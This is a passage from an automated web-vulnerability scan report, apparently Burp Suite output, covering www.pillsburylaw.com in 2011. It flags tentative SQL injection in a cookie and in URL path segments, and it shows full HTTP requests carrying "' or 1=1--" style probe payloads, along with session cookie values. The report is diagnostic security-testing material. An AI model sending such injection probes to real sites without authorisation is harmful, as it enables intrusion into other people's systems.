The PCUSERNAME cookie appears to be vulnerable to SQL injection attacks. The payloads 18153507'%20or%201%3d1--%20 and 18153507'%20or%201%3d2--%20 were each submitted in the PCUSERNAME cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /scripts/images/arrows-default.png HTTP/1.1
Host: www.pillsburylaw.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.pillsburylaw.com/scripts/anythingslider/anythingslider.css
Cookie: __utma=249287046.1504885052.1305202905.1305202905.1305216540.2; __utmz=249287046.1305216540.2.2.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Pillsbury%20Winthrop%20Shaw%20Pittman; hubspotdt=2011-05-12%2008%3A31%3A41; hubspotutk=148ff71c54bf42a7b313024966931ee5; hubspotvd=148ff71c54bf42a7b313024966931ee5; hubspotvw=148ff71c54bf42a7b313024966931ee5; hubspotvm=148ff71c54bf42a7b313024966931ee5; hsfirstvisit=http%3A%2F%2Fwww.pillsburylaw.com%2F|http%3A%2F%2Fwww.google.com%2Fsearch%3Fq%3DPillsbury%2BWinthrop%2BShaw%2BPittman%26ie%3Dutf-8%26oe%3Dutf-8%26aq%3Dt%26rls%3Dorg.mozilla%3Aen-US%3Aofficial%26client%3Dfirefox-a|2011-05-12%2008%3A21%3A46; CFID=11819537; CFTOKEN=91778988; PCONNECTID=; PCUSERNAME=18153507'%20or%201%3d1--%20; MEDIAUSERID=; MEDIAUSERNAME=; __utmb=249287046.1.10.1305216540; __utmc=249287046

Response 1 (redirected)

HTTP/1.1 302 Moved Temporarily
Connection: close
Date: Thu, 12 May 2011 16:11:54 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: PCUSERNAME=;expires=Wed, 12-May-2010 16:11:54 GMT;path=/
location: /
Content-Type: text/html; charset=UTF-8

Request 2

GET /scripts/images/arrows-default.png HTTP/1.1
Host: www.pillsburylaw.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.pillsburylaw.com/scripts/anythingslider/anythingslider.css
Cookie: __utma=249287046.1504885052.1305202905.1305202905.1305216540.2; __utmz=249287046.1305216540.2.2.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Pillsbury%20Winthrop%20Shaw%20Pittman; hubspotdt=2011-05-12%2008%3A31%3A41; hubspotutk=148ff71c54bf42a7b313024966931ee5; hubspotvd=148ff71c54bf42a7b313024966931ee5; hubspotvw=148ff71c54bf42a7b313024966931ee5; hubspotvm=148ff71c54bf42a7b313024966931ee5; hsfirstvisit=http%3A%2F%2Fwww.pillsburylaw.com%2F|http%3A%2F%2Fwww.google.com%2Fsearch%3Fq%3DPillsbury%2BWinthrop%2BShaw%2BPittman%26ie%3Dutf-8%26oe%3Dutf-8%26aq%3Dt%26rls%3Dorg.mozilla%3Aen-US%3Aofficial%26client%3Dfirefox-a|2011-05-12%2008%3A21%3A46; CFID=11819537; CFTOKEN=91778988; PCONNECTID=; PCUSERNAME=18153507'%20or%201%3d2--%20; MEDIAUSERID=; MEDIAUSERNAME=; __utmb=249287046.1.10.1305216540; __utmc=249287046

Response 2 (redirected)

HTTP/1.1 200 OK
Content-Length: 18948
Content-Type: text/html
Content-Location: http://www.pillsburylaw.com/404.htm
Last-Modified: Wed, 09 Feb 2011 21:25:38 GMT
Accept-Ranges: bytes
ETag: "b4792ae59fc8cb1:b91"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Thu, 12 May 2011 16:11:53 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Pillsbury Law &gt; Page or File Not Found</title>
<META name="description" content="Pillsbury Winthrop Shaw Pittman">
<META name="keywords" content="">
<META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=iso-8859-1" />
<link rel="shortcut icon" type="image/ico" href="/favicon.ico">
<META HTTP-EQUIV="imagetoolbar" CONTENT="no">
<meta name="verify-v1" content="ZyDzeYw1HMb2yJudqIIqE+bMnyWw5jHvupSO4NAX2cA=" >
<meta http-equiv="X-UA-Compatible" content="IE=8" />

<link rel="stylesheet" href="/scripts/general.css?v=20110202" type="text/css" media="all" />
<link rel="stylesheet" href="/scripts/menu.css?v=20110202" type="text/css" media="all" />

<script language="javascript" type="text/javascript" src="/scripts/jquery.js"></script>
<script language="javascript" type="text/javascript" src="/scripts/jquery.dimensions.js"></script>


<link rel="stylesheet" href="/sifr3/sifr3.css" type="text/css" media="screen" />

<script language="javascript" type="text/javascript" src="/sifr3/sifr3.js"></script>


<link rel="stylesheet" href="scripts/nyroModal/nyroModal.css" type="text/css" media="screen" />
<script language="javascript" type="text/javascript" src="/scripts/nyroModal/nyroModal.js"></script>

<script type="text/javascript">
<!--//
function checkSearchForm(){
    if((document.forms.sitesearch.keyword.value.length == 0)||(document.forms.sitesearch.keyword.value == "Search")){
       alert('Please enter a keyword for your search.');
       document.forms.sitesearch.keyw
...[SNIP]...
1.85. http://www.pillsburylaw.com/scripts/images/arrows-default.png [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.pillsburylaw.com
Path:   /scripts/images/arrows-default.png

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. The payloads 14260958'%20or%201%3d1--%20 and 14260958'%20or%201%3d2--%20 were each submitted in the REST URL parameter 1. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /scripts14260958'%20or%201%3d1--%20/images/arrows-default.png HTTP/1.1
Host: www.pillsburylaw.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.pillsburylaw.com/scripts/anythingslider/anythingslider.css
Cookie: __utma=249287046.1504885052.1305202905.1305202905.1305216540.2; __utmz=249287046.1305216540.2.2.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Pillsbury%20Winthrop%20Shaw%20Pittman; hubspotdt=2011-05-12%2008%3A31%3A41; hubspotutk=148ff71c54bf42a7b313024966931ee5; hubspotvd=148ff71c54bf42a7b313024966931ee5; hubspotvw=148ff71c54bf42a7b313024966931ee5; hubspotvm=148ff71c54bf42a7b313024966931ee5; hsfirstvisit=http%3A%2F%2Fwww.pillsburylaw.com%2F|http%3A%2F%2Fwww.google.com%2Fsearch%3Fq%3DPillsbury%2BWinthrop%2BShaw%2BPittman%26ie%3Dutf-8%26oe%3Dutf-8%26aq%3Dt%26rls%3Dorg.mozilla%3Aen-US%3Aofficial%26client%3Dfirefox-a|2011-05-12%2008%3A21%3A46; CFID=11819537; CFTOKEN=91778988; PCONNECTID=; PCUSERNAME=; MEDIAUSERID=; MEDIAUSERNAME=; __utmb=249287046.1.10.1305216540; __utmc=249287046

Response 1 (redirected)

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=11819537;path=/
Set-Cookie: CFTOKEN=91778988;path=/
Date: Thu, 12 May 2011 16:12:30 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=iso-8859-1" />
<link rel="shortcut icon" type="image/ico" href="/favicon.ico">
<META HTTP-EQUIV="imagetoolbar" CONTENT="no">
<meta name="verify-v1" content="ZyDzeYw1HMb2yJudqIIqE+bMnyWw5jHvupSO4NAX2cA=" >
<meta http-equiv="X-UA-Compatible" content="IE=8" />

<link rel="stylesheet" href="/scripts/general.css?v=20110202" type="text/css" media="all" />
<link rel="stylesheet" href="/scripts/menu.css?v=20110202" type="text/css" media="all" />

<script language="javascript" type="text/javascript" src="/scripts/jquery.js"></script>
<script language="javascript" type="text/javascript" src="/scripts/jquery.dimensions.js"></script>


<link rel="stylesheet" href="/sifr3/sifr3.css" type="text/css" media="screen" />

<script language="javascript" type="text/javascript" src="/sifr3/sifr3homepage.js"></script>


<link rel="stylesheet" href="/scripts/nyroModal/nyroModal.css" type="text/css" media="screen" />
<script language="javascript" type="text/javascript" src="/scripts/nyroModal/nyroModal.js"></script>

<script type="text/javascript">
<!--//
function checkSearchForm(){
    if((document.forms.sitesearch.keyword.value.length == 0)||(document.forms.sitesearch.keyword.value == "Search")){
       alert('Please enter a keyword for your search.');
       document.forms.sitesearch.keyword.focus();
       return false;
       }
   }
-->
</script>

<style type="text/css">
<!--
body,td,th {
   font-size: 9pt;
}
body {
   background-color: #FFF; /* #F3F4F4; */
   margin-left: 0px;
   margin-top: 0px;
   margin-right: 10px;
   margin-bottom: 10px;
}
-->
</style>
<!--[if IE]>
<style type="text/css">
bo
...[SNIP]...

Request 2

GET /scripts14260958'%20or%201%3d2--%20/images/arrows-default.png HTTP/1.1
Host: www.pillsburylaw.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.pillsburylaw.com/scripts/anythingslider/anythingslider.css
Cookie: __utma=249287046.1504885052.1305202905.1305202905.1305216540.2; __utmz=249287046.1305216540.2.2.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Pillsbury%20Winthrop%20Shaw%20Pittman; hubspotdt=2011-05-12%2008%3A31%3A41; hubspotutk=148ff71c54bf42a7b313024966931ee5; hubspotvd=148ff71c54bf42a7b313024966931ee5; hubspotvw=148ff71c54bf42a7b313024966931ee5; hubspotvm=148ff71c54bf42a7b313024966931ee5; hsfirstvisit=http%3A%2F%2Fwww.pillsburylaw.com%2F|http%3A%2F%2Fwww.google.com%2Fsearch%3Fq%3DPillsbury%2BWinthrop%2BShaw%2BPittman%26ie%3Dutf-8%26oe%3Dutf-8%26aq%3Dt%26rls%3Dorg.mozilla%3Aen-US%3Aofficial%26client%3Dfirefox-a|2011-05-12%2008%3A21%3A46; CFID=11819537; CFTOKEN=91778988; PCONNECTID=; PCUSERNAME=; MEDIAUSERID=; MEDIAUSERNAME=; __utmb=249287046.1.10.1305216540; __utmc=249287046

Response 2 (redirected)

HTTP/1.1 200 OK
Content-Length: 18948
Content-Type: text/html
Content-Location: http://www.pillsburylaw.com/404.htm
Last-Modified: Wed, 09 Feb 2011 21:25:38 GMT
Accept-Ranges: bytes
ETag: "b4792ae59fc8cb1:b91"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Thu, 12 May 2011 16:12:31 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Pillsbury Law &gt; Page or File Not Found</title>
<META name="description" content="Pillsbury Winthrop Shaw Pittman">
<META name="keywords" content="">
<META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=iso-8859-1" />
<link rel="shortcut icon" type="image/ico" href="/favicon.ico">
<META HTTP-EQUIV="imagetoolbar" CONTENT="no">
<meta name="verify-v1" content="ZyDzeYw1HMb2yJudqIIqE+bMnyWw5jHvupSO4NAX2cA=" >
<meta http-equiv="X-UA-Compatible" content="IE=8" />

<link rel="stylesheet" href="/scripts/general.css?v=20110202" type="text/css" media="all" />
<link rel="stylesheet" href="/scripts/menu.css?v=20110202" type="text/css" media="all" />

<script language="javascript" type="text/javascript" src="/scripts/jquery.js"></script>
<script language="javascript" type="text/javascript" src="/scripts/jquery.dimensions.js"></script>


<link rel="stylesheet" href="/sifr3/sifr3.css" type="text/css" media="screen" />

<script language="javascript" type="text/javascript" src="/sifr3/sifr3.js"></script>


<link rel="stylesheet" href="scripts/nyroModal/nyroModal.css" type="text/css" media="screen" />
<script language="javascript" type="text/javascript" src="/scripts/nyroModal/nyroModal.js"></script>

<script type="text/javascript">
<!--//
function checkSearchForm(){
    if((document.forms.sitesearch.keyword.value.length == 0)||(document.forms.sitesearch.keyword.value == "Search")){
       alert('Please enter a keyword for your search.');
       document.forms.sitesearch.keyword.focus();
       return false;
       }
   }
-->
</script>

<style type="text/css">
<!--
body,
...[SNIP]...
1.86. http://www.pillsburylaw.com/scripts/images/arrows-default.png [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.pillsburylaw.com
Path:   /scripts/images/arrows-default.png

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. The payloads 64052056'%20or%201%3d1--%20 and 64052056'%20or%201%3d2--%20 were each submitted in the REST URL parameter 2. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /scripts/images64052056'%20or%201%3d1--%20/arrows-default.png HTTP/1.1
Host: www.pillsburylaw.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.pillsburylaw.com/scripts/anythingslider/anythingslider.css
Cookie: __utma=249287046.1504885052.1305202905.1305202905.1305216540.2; __utmz=249287046.1305216540.2.2.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Pillsbury%20Winthrop%20Shaw%20Pittman; hubspotdt=2011-05-12%2008%3A31%3A41; hubspotutk=148ff71c54bf42a7b313024966931ee5; hubspotvd=148ff71c54bf42a7b313024966931ee5; hubspotvw=148ff71c54bf42a7b313024966931ee5; hubspotvm=148ff71c54bf42a7b313024966931ee5; hsfirstvisit=http%3A%2F%2Fwww.pillsburylaw.com%2F|http%3A%2F%2Fwww.google.com%2Fsearch%3Fq%3DPillsbury%2BWinthrop%2BShaw%2BPittman%26ie%3Dutf-8%26oe%3Dutf-8%26aq%3Dt%26rls%3Dorg.mozilla%3Aen-US%3Aofficial%26client%3Dfirefox-a|2011-05-12%2008%3A21%3A46; CFID=11819537; CFTOKEN=91778988; PCONNECTID=; PCUSERNAME=; MEDIAUSERID=; MEDIAUSERNAME=; __utmb=249287046.1.10.1305216540; __utmc=249287046

Response 1 (redirected)

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=11819537;path=/
Set-Cookie: CFTOKEN=91778988;path=/
Date: Thu, 12 May 2011 16:12:35 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=iso-8859-1" />
<link rel="shortcut icon" type="image/ico" href="/favicon.ico">
<META HTTP-EQUIV="imagetoolbar" CONTENT="no">
<meta name="verify-v1" content="ZyDzeYw1HMb2yJudqIIqE+bMnyWw5jHvupSO4NAX2cA=" >
<meta http-equiv="X-UA-Compatible" content="IE=8" />

<link rel="stylesheet" href="/scripts/general.css?v=20110202" type="text/css" media="all" />
<link rel="stylesheet" href="/scripts/menu.css?v=20110202" type="text/css" media="all" />

<script language="javascript" type="text/javascript" src="/scripts/jquery.js"></script>
<script language="javascript" type="text/javascript" src="/scripts/jquery.dimensions.js"></script>


<link rel="stylesheet" href="/sifr3/sifr3.css" type="text/css" media="screen" />

<script language="javascript" type="text/javascript" src="/sifr3/sifr3homepage.js"></script>


<link rel="stylesheet" href="/scripts/nyroModal/nyroModal.css" type="text/css" media="screen" />
<script language="javascript" type="text/javascript" src="/scripts/nyroModal/nyroModal.js"></script>

<script type="text/javascript">
<!--//
function checkSearchForm(){
    if((document.forms.sitesearch.keyword.value.length == 0)||(document.forms.sitesearch.keyword.value == "Search")){
       alert('Please enter a keyword for your search.');
       document.forms.sitesearch.keyword.focus();
       return false;
       }
   }
-->
</script>

<style type="text/css">
<!--
body,td,th {
   font-size: 9pt;
}
body {
   background-color: #FFF; /* #F3F4F4; */
   margin-left: 0px;
   margin-top: 0px;
   margin-right: 10px;
   margin-bottom: 10px;
}
-->
</style>
<!--[if IE]>
<style type="text/css">
bo
...[SNIP]...

Request 2

GET /scripts/images64052056'%20or%201%3d2--%20/arrows-default.png HTTP/1.1
Host: www.pillsburylaw.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.pillsburylaw.com/scripts/anythingslider/anythingslider.css
Cookie: __utma=249287046.1504885052.1305202905.1305202905.1305216540.2; __utmz=249287046.1305216540.2.2.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Pillsbury%20Winthrop%20Shaw%20Pittman; hubspotdt=2011-05-12%2008%3A31%3A41; hubspotutk=148ff71c54bf42a7b313024966931ee5; hubspotvd=148ff71c54bf42a7b313024966931ee5; hubspotvw=148ff71c54bf42a7b313024966931ee5; hubspotvm=148ff71c54bf42a7b313024966931ee5; hsfirstvisit=http%3A%2F%2Fwww.pillsburylaw.com%2F|http%3A%2F%2Fwww.google.com%2Fsearch%3Fq%3DPillsbury%2BWinthrop%2BShaw%2BPittman%26ie%3Dutf-8%26oe%3Dutf-8%26aq%3Dt%26rls%3Dorg.mozilla%3Aen-US%3Aofficial%26client%3Dfirefox-a|2011-05-12%2008%3A21%3A46; CFID=11819537; CFTOKEN=91778988; PCONNECTID=; PCUSERNAME=; MEDIAUSERID=; MEDIAUSERNAME=; __utmb=249287046.1.10.1305216540; __utmc=249287046

Response 2 (redirected)

HTTP/1.1 200 OK
Content-Length: 18948
Content-Type: text/html
Content-Location: http://www.pillsburylaw.com/404.htm
Last-Modified: Wed, 09 Feb 2011 21:25:38 GMT
Accept-Ranges: bytes
ETag: "b4792ae59fc8cb1:b91"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Thu, 12 May 2011 16:12:35 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Pillsbury Law &gt; Page or File Not Found</title>
<META name="description" content="Pillsbury Winthrop Shaw Pittman">
<META name="keywords" content="">
<META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=iso-8859-1" />
<link rel="shortcut icon" type="image/ico" href="/favicon.ico">
<META HTTP-EQUIV="imagetoolbar" CONTENT="no">
<meta name="verify-v1" content="ZyDzeYw1HMb2yJudqIIqE+bMnyWw5jHvupSO4NAX2cA=" >
<meta http-equiv="X-UA-Compatible" content="IE=8" />

<link rel="stylesheet" href="/scripts/general.css?v=20110202" type="text/css" media="all" />
<link rel="stylesheet" href="/scripts/menu.css?v=20110202" type="text/css" media="all" />

<script language="javascript" type="text/javascript" src="/scripts/jquery.js"></script>
<script language="javascript" type="text/javascript" src="/scripts/jquery.dimensions.js"></script>


<link rel="stylesheet" href="/sifr3/sifr3.css" type="text/css" media="screen" />

<script language="javascript" type="text/javascript" src="/sifr3/sifr3.js"></script>


<link rel="stylesheet" href="scripts/nyroModal/nyroModal.css" type="text/css" media="screen" />
<script language="javascript" type="text/javascript" src="/scripts/nyroModal/nyroModal.js"></script>

<script type="text/javascript">
<!--//
function checkSearchForm(){
    if((document.forms.sitesearch.keyword.value.length == 0)||(document.forms.sitesearch.keyword.value == "Search")){
       alert('Please enter a keyword for your search.');
       document.forms.sitesearch.keyword.focus();
       return false;
       }
   }
-->
</script>

<style type="text/css">
<!--
body,
...[SNIP]...
1.87. http://www.pillsburylaw.com/scripts/images/arrows-default.png [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.pillsburylaw.com
Path:   /scripts/images/arrows-default.png

Issue detail

The REST URL parameter 3 appears to be vulnerable to SQL injection attacks. The payloads 19323163'%20or%201%3d1--%20 and 19323163'%20or%201%3d2--%20 were each submitted in the REST URL parameter 3. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /scripts/images/arrows-default.png19323163'%20or%201%3d1--%20 HTTP/1.1
Host: www.pillsburylaw.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.pillsburylaw.com/scripts/anythingslider/anythingslider.css
Cookie: __utma=249287046.1504885052.1305202905.1305202905.1305216540.2; __utmz=249287046.1305216540.2.2.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Pillsbury%20Winthrop%20Shaw%20Pittman; hubspotdt=2011-05-12%2008%3A31%3A41; hubspotutk=148ff71c54bf42a7b313024966931ee5; hubspotvd=148ff71c54bf42a7b313024966931ee5; hubspotvw=148ff71c54bf42a7b313024966931ee5; hubspotvm=148ff71c54bf42a7b313024966931ee5; hsfirstvisit=http%3A%2F%2Fwww.pillsburylaw.com%2F|http%3A%2F%2Fwww.google.com%2Fsearch%3Fq%3DPillsbury%2BWinthrop%2BShaw%2BPittman%26ie%3Dutf-8%26oe%3Dutf-8%26aq%3Dt%26rls%3Dorg.mozilla%3Aen-US%3Aofficial%26client%3Dfirefox-a|2011-05-12%2008%3A21%3A46; CFID=11819537; CFTOKEN=91778988; PCONNECTID=; PCUSERNAME=; MEDIAUSERID=; MEDIAUSERNAME=; __utmb=249287046.1.10.1305216540; __utmc=249287046

Response 1 (redirected)

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=11819537;path=/
Set-Cookie: CFTOKEN=91778988;path=/
Date: Thu, 12 May 2011 16:12:39 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=iso-8859-1" />
<link rel="shortcut icon" type="image/ico" href="/favicon.ico">
<META HTTP-EQUIV="imagetoolbar" CONTENT="no">
<meta name="verify-v1" content="ZyDzeYw1HMb2yJudqIIqE+bMnyWw5jHvupSO4NAX2cA=" >
<meta http-equiv="X-UA-Compatible" content="IE=8" />

<link rel="stylesheet" href="/scripts/general.css?v=20110202" type="text/css" media="all" />
<link rel="stylesheet" href="/scripts/menu.css?v=20110202" type="text/css" media="all" />

<script language="javascript" type="text/javascript" src="/scripts/jquery.js"></script>
<script language="javascript" type="text/javascript" src="/scripts/jquery.dimensions.js"></script>


<link rel="stylesheet" href="/sifr3/sifr3.css" type="text/css" media="screen" />

<script language="javascript" type="text/javascript" src="/sifr3/sifr3homepage.js"></script>


<link rel="stylesheet" href="/scripts/nyroModal/nyroModal.css" type="text/css" media="screen" />
<script language="javascript" type="text/javascript" src="/scripts/nyroModal/nyroModal.js"></script>

<script type="text/javascript">
<!--//
function checkSearchForm(){
    if((document.forms.sitesearch.keyword.value.length == 0)||(document.forms.sitesearch.keyword.value == "Search")){
       alert('Please enter a keyword for your search.');
       document.forms.sitesearch.keyword.focus();
       return false;
       }
   }
-->
</script>

<style type="text/css">
<!--
body,td,th {
   font-size: 9pt;
}
body {
   background-color: #FFF; /* #F3F4F4; */
   margin-left: 0px;
   margin-top: 0px;
   margin-right: 10px;
   margin-bottom: 10px;
}
-->
</style>
<!--[if IE]>
<style type="text/css">
bo
...[SNIP]...

Request 2

GET /scripts/images/arrows-default.png19323163'%20or%201%3d2--%20 HTTP/1.1
Host: www.pillsburylaw.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.pillsburylaw.com/scripts/anythingslider/anythingslider.css
Cookie: __utma=249287046.1504885052.1305202905.1305202905.1305216540.2; __utmz=249287046.1305216540.2.2.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Pillsbury%20Winthrop%20Shaw%20Pittman; hubspotdt=2011-05-12%2008%3A31%3A41; hubspotutk=148ff71c54bf42a7b313024966931ee5; hubspotvd=148ff71c54bf42a7b313024966931ee5; hubspotvw=148ff71c54bf42a7b313024966931ee5; hubspotvm=148ff71c54bf42a7b313024966931ee5; hsfirstvisit=http%3A%2F%2Fwww.pillsburylaw.com%2F|http%3A%2F%2Fwww.google.com%2Fsearch%3Fq%3DPillsbury%2BWinthrop%2BShaw%2BPittman%26ie%3Dutf-8%26oe%3Dutf-8%26aq%3Dt%26rls%3Dorg.mozilla%3Aen-US%3Aofficial%26client%3Dfirefox-a|2011-05-12%2008%3A21%3A46; CFID=11819537; CFTOKEN=91778988; PCONNECTID=; PCUSERNAME=; MEDIAUSERID=; MEDIAUSERNAME=; __utmb=249287046.1.10.1305216540; __utmc=249287046

Response 2 (redirected)

HTTP/1.1 200 OK
Content-Length: 18948
Content-Type: text/html
Content-Location: http://www.pillsburylaw.com/404.htm
Last-Modified: Wed, 09 Feb 2011 21:25:38 GMT
Accept-Ranges: bytes
ETag: "b4792ae59fc8cb1:b91"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Thu, 12 May 2011 16:12:39 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Pillsbury Law &gt; Page or File Not Found</title>
<META name="description" content="Pillsbury Winthrop Shaw Pittman">
<META name="keywords" content="">
<META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=iso-8859-1" />
<link rel="shortcut icon" type="image/ico" href="/favicon.ico">
<META HTTP-EQUIV="imagetoolbar" CONTENT="no">
<meta name="verify-v1" content="ZyDzeYw1HMb2yJudqIIqE+bMnyWw5jHvupSO4NAX2cA=" >
<meta http-equiv="X-UA-Compatible" content="IE=8" />

<link rel="stylesheet" href="/scripts/general.css?v=20110202" type="text/css" media="all" />
<link rel="stylesheet" href="/scripts/menu.css?v=20110202" type="text/css" media="all" />

<script language="javascript" type="text/javascript" src="/scripts/jquery.js"></script>
<script language="javascript" type="text/javascript" src="/scripts/jquery.dimensions.js"></script>


<link rel="stylesheet" href="/sifr3/sifr3.css" type="text/css" media="screen" />

<script language="javascript" type="text/javascript" src="/sifr3/sifr3.js"></script>


<link rel="stylesheet" href="scripts/nyroModal/nyroModal.css" type="text/css" media="screen" />
<script language="javascript" type="text/javascript" src="/scripts/nyroModal/nyroModal.js"></script>

<script type="text/javascript">
<!--//
function checkSearchForm(){
    if((document.forms.sitesearch.keyword.value.length == 0)||(document.forms.sitesearch.keyword.value == "Search")){
       alert('Please enter a keyword for your search.');
       document.forms.sitesearch.keyword.focus();
       return false;
       }
   }
-->
</script>

<style type="text/css">
<!--
body,
...[SNIP]...
1.88. http://www.pillsburylaw.com/scripts/images/arrows-default.png [__utma cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
